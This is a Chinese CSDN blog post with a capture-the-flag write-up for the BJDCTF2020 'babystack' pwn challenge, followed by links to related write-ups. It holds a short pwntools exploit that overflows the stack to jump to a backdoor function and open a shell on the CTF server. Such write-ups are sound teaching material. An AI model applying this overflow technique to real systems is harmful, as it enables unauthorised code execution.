BJDCTF2020 babystack

最新推荐文章于 2024-05-13 18:34:53 发布

whit233

最新推荐文章于 2024-05-13 18:34:53 发布

阅读量209

点赞数

分类专栏： ctfshow pwn详细wp 文章标签： python

本文链接：https://blog.csdn.net/qq_39980610/article/details/126467325

版权

ctfshow pwn详细wp 专栏收录该内容

14 篇文章 0 订阅

订阅专栏

这篇博客介绍了如何使用ida分析64位nx保护的程序，并展示了ret2text技术来实现远程代码执行。作者通过创建一个payload，发送到目标服务器（pwn.challenge.ctf.show:28117），成功触发了backdoor并进入交互模式，揭示了漏洞利用的过程。

摘要由CSDN通过智能技术生成

checksec

64位nx

ida：

ret2text

exp:

from pwn import*
r=remote("pwn.challenge.ctf.show", 28117)
backdoor=0x4006e6
retn=0X4006fa
r.recvuntil("name:\n")
r.sendline("100")
r.recvuntil("name?")
payload=b"a"*0x18+p64(backdoor)
r.sendline(payload)
r.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

whit233

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
BJDCTF2020 babystack

babystack
复制链接

扫一扫

专栏目录

ctfshow pwn2

qq_39980610的博客

08-19

792

pwn2

bjdctf_2020_babystack

m0_52231248的博客

11-07

bjdctf_2020_babystack 题目Ubuntu 16 Checksec检查一下 Ida: read函数的读取长度是我们的输入，存在溢出点，offest=0x10+0x8 然后main函数上面就是backdoor函数构造exp：成功得到flag：

参与评论您还未登录，请先登录后发表或查看评论

[buuctf]bjdctf_2020_babystack

逆向萌新的博客

06-19

694

[buuctf]bjdctf_2020_babystack

BUUCTF：bjdctf_2020_babystack2（write up）

qq_44768749的博客

08-24

1571

BUUCTF：bjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序，开启了栈不可执行、部分RELRO保护 0x02 运行先输入name的长度，再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路比较nbytes和10的大小，可以利用符号溢出漏洞，输入一个负数，进而输入name的时候可以实现栈溢出跳转到后门函数ge

buu bjdctf_2020_babystack2 整数溢出、栈溢出

qq_41849152的博客

09-14

185

整数溢出、栈溢出

BUUCTF pwn水题大赏（三）

o琦野o的博客

02-03

376

BUUCTF pwn水题大赏21.铁人三项(第五赛区)_2018_rop22.bjdctf_2020_babyrop23.[BJDCTF 2nd]r2t424.[BJDCTF 2nd]test25.bjdctf_2020_babystack226.bjdctf_2020_babyrop227.bjdctf_2020_router28.others_babystack29.ciscn_2019_s_430.wdb2018_guess 21.铁人三项(第五赛区)_2018_rop 32位栈溢出，利用 write

BUUCTF_WriteUp 2021-08-23

m0_56897090的博客

08-23

371

2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识：0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2：mprotectc

bjdctf_2020_babystack【BUUCTF】

qq_41696518的博客

08-26

732

bjdctf_2020_babystack

【PWN · ret2text】[BJDCTF 2020]babystack

Mr_Fmnwon的博客

04-20

979

作为pwn新手，尽可能在刷题中，记录、学习一些通用的知识点，因此wp是少不了的。本题是一道简单的ret2text。

【CTF】bjdctf_2020_babystack 1

凉水的博客

01-21

1318

解题思路: 1 先反编译： undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *

[BJDCTF 2020]babystack2.0

weixin_61995249的博客

05-21

303

注意题目是Ubuntu16，若本机是Ubuntu18要调试pwn文件要抬栈，不然会报错。注意以下以下两句，要在后面加‘\n’，因为puts函数后面会加‘\n’3、若是其他情况，则可能报错。

BJDCTF 2020 babystack2.0

2301_79793667的博客

12-11

307

因为第二次所需要读取的数值的字节数大于10，第一次输入的值在第二次作为无符号整型，所以我们需要输入一个负数来同时满足第一次输入和第二次输入，可以输入-1。通过分析，我们发现第一次输入的值不能大于10，否则会退出程序，第一次输入的值将作为第二次通过read函数输入的buf的值的最大字节数。让我们输入数据，随便输入了几个数据，就被退出程序了，那我们检查一下附件，然后用ida打开。通过read函数栈溢出到后门函数的地址0x400726。那我们就用64位ida打开。首先打开环境，并下载附件。找到了后门函数的地址。

[BJDCTF 2020]babystack2.0 CTF-PWN

最新发布

m0_72904009的博客

05-13

196

[BJDCTF 2020]babystack2.0 CTF-PWN

bjdctf_2020_babystack题解

OrientalGlass的博客

01-08

377

send是模拟交互的情况,如果使用send(0x111)会有报错,并且发送的字符串要带上换行符,否则会无法结束输入。先输入一个整形数据用于确定buf串需要读入多少个字节,这里后续使用的是0x111。nbytes在buf下方,并且nbytes是qword类型,占8个字节。解释了为什么第一次send要使用字符串类型而不能直接发送int类型。不过这里还有一个异或就是本机运行该程序不能成功获取执行权,非常奇怪。再发送覆盖数据覆盖掉返回地址执行backdoor函数即可。首先输入一个足以覆盖掉返回地址的数字。

PWN-PRACTICE-CTFSHOW-3

P1umH0的博客

01-13

623

PWN-PRACTICE-CTFSHOW-3pwn10萌新赛-签到题萌新赛-数学99内部赛-签到题 pwn10 格式化字符串漏洞，覆写num为16即可打印出flag # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28045) elf=ELF("./pwn1") #gdb.attach(io,"b * 0x0

[BJDCTF2020]RSA

08-11

RSA（Rivest-Shamir-Adleman）是一种非对称加密算法，常用于数据加密和数字签名。...在BJDCTF2020中，RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息，请提供详细内容以便我能够帮助你更好。